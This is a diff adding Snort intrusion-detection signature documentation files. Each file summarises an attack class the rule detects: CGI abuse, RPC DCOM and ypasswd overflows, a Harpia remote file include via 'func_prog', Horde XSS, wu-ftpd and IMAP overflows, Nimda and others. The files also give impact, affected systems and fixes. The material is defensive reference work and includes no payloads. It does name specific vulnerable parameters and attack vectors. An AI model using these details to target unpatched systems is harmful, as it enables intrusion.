+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1473.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1473
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3370.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3370
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1472.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1472
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/281.txt
@@ -0,0 +1,73 @@
+Rule:  
+
+--
+Sid:
+281
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service (DoS) attack that causes some Ascend routers to reboot.
+
+--
+Impact:
+Denial of Service. Traffic between network segments or between internal 
+and external networks can be disrupted.
+
+--
+Detailed Information:
+Some Ascend routers run configuration software that is able to locate 
+other Ascend routers by broadcasting on UDP port 9 (discard).  This port
+is listened on by the Java Configurator tool.  A packet with a specially
+crafted payload can cause the routers to reboot.
+
+--
+Affected Systems:
+	Lucent Ascend MAX Router 5.0 and previous
+	Lucent Ascend Pipeline Router 6.0 and previous
+	Lucent Ascend Pipeline Router 6.0 and previous
+
+
+--
+Attack Scenarios:
+Ascend routers can be forced to reboot remotely without authorization.  
+Since the offending packet is UDP (which is not connection oriented), 
+the sending address can be easily spoofed.  
+
+--
+Ease of Attack:
+Simple.  An exploit is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+An upgrade is available from the manufacturer.  Filtering traffic to 
+port 9 will also prevent this exploit.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS262
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0060
+
+Bugtraq:
+http://www.securityfocus.com/bid/714
+
+--
--- /dev/null
+++ b/doc/signatures/840.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+840
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2533.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2533
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1414.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1414
+
+--
+
+Summary:
+This event is generated when an SNMP connection over TCP using the 
+default 'private' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'private' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/100000671.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000671
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "preload.php" using a remote file being passed as the 
+"func_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "func_prog" parameter in the "preload.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/651.txt
@@ -0,0 +1,55 @@
+Rule:  
+--
+Sid:
+651
+
+--
+Summary:
+Binary data in the packet matched one kind of byte sequence used as filler in buffer overflow attacks.
+
+--
+Impact:
+It is possible someone was attempting a buffer overflow to gain unauthorized access to one of your servers.
+
+--
+Detailed Information:
+This rule triggers when a binary pattern appears in the packet contents which matches one form of filler-bytes used in buffer overflow attacks. Buffer overflows allow execution of arbitrary code with the privlege level of the affected server process. A very detailed discussion of how basic buffer overflows work can be found in the text of "Smashing the stack for fun and profit" by Aleph One in Phrack #49.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+If the attacker suspects you have a server which is vulnerable to buffer overflow, they will attempt to exploit this vulnerability to gain access.
+
+
+--
+Ease of Attack:
+Tools that use buffer overflows with stealth nop are widely available.
+
+--
+False Positives:
+This byte pattern can naturally occur in almost any binary data, so file downloads, streaming media, etc can cause this to false positive. If this traffic appears to be coming from a web or ftp server outside your network to one of your client machines, it is likely a false alert caused by someone downloading a binary file. If this was directed at a port on one of your machines which is running a server process, you may want to check to see if it has been exploited.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Matt Kettler mkettler@evi-inc.com	Initial Research
+Josh Gray	Edits
+
+-- 
+Additional References:
+http://online.securityfocus.com/library/14
+
+
+--
--- /dev/null
+++ b/doc/signatures/3265.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3265
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2025.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2025
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Bugtraq:
+http://www.securityfocus.com/bid/2763
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/100000779.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000779
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show" parameter in the "index.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2758.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2758
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1824.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1824
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1678.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1678
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1284.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+Sid:
+1284
+
+--
+
+Summary:
+This event is generated when an attempt is made to download a
+Nimda-infected attachment from a web server.
+
+--
+Impact:
+Serious. A Nimda-infected web server may have spread the Nimda worm to the web
+client.
+
+--
+Detailed Information:
+One of the methods the Nimda worm uses to propagate is by passing malicious
+code from an infected web server to a web client.  The Nimda-infected
+code often uses the filename extension ".EML".
+
+The fully automated Nimda worm that has already infected an IIS web server
+searches through and infects the local web pages with malicious javascript.
+When a vulnerable web client attempts to load a web page from this server,
+the javascript will cause the web client to download and execute the
+Nimda-infected readme.eml file, causing the web client to become
+Nimda-infected.
+
+--
+Affected Systems:
+	Microsoft Windows based systems.
+
+--
+Attack Scenarios:
+The user must use a link on an infected server.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+The Nimda worm may spread via any file with the .EML or .NWS extension, not
+just readme.eml.  This rule will not catch other .EML or .NWS files.
+
+--
+Corrective Action:
+Examine the host for signs of infection.
+
+Use Anti-Virus tools to clean an infected host.
+
+Consider the use of alternative operating systems that are not
+vulnerable to this kind of attack.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1903.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1903
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP RENAME
+command with a malformed argument to an internal IMAP server port. This
+may indicate an attempt to exploit a buffer overflow vulnerability in
+the IMAP RENAME command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a RENAME command with a malformed and overly long argument is sent
+to a vulnerable IMAP server, a buffer overflow condition may occur. This
+can allow an attacker to execute arbitrary code from the command shell.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long RENAME command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/352.txt
@@ -0,0 +1,64 @@
+SID:
+352
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated 
+user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+	NcFTP Software NcFTPD 2.3.5
+	Washington University wu-ftpd 2.4.2 (beta 18) VR10 RedHat wu-ftpd 2.4.2 b18-2 
+	Washington University wu-ftpd 2.4.2 academ[BETA-18]
+	Probably others as well, suspect anything under 
+	Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2391.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd APPE command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the APPE command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the APPE 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2002.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2002
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/475.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+
+Sid:
+475
+
+--
+
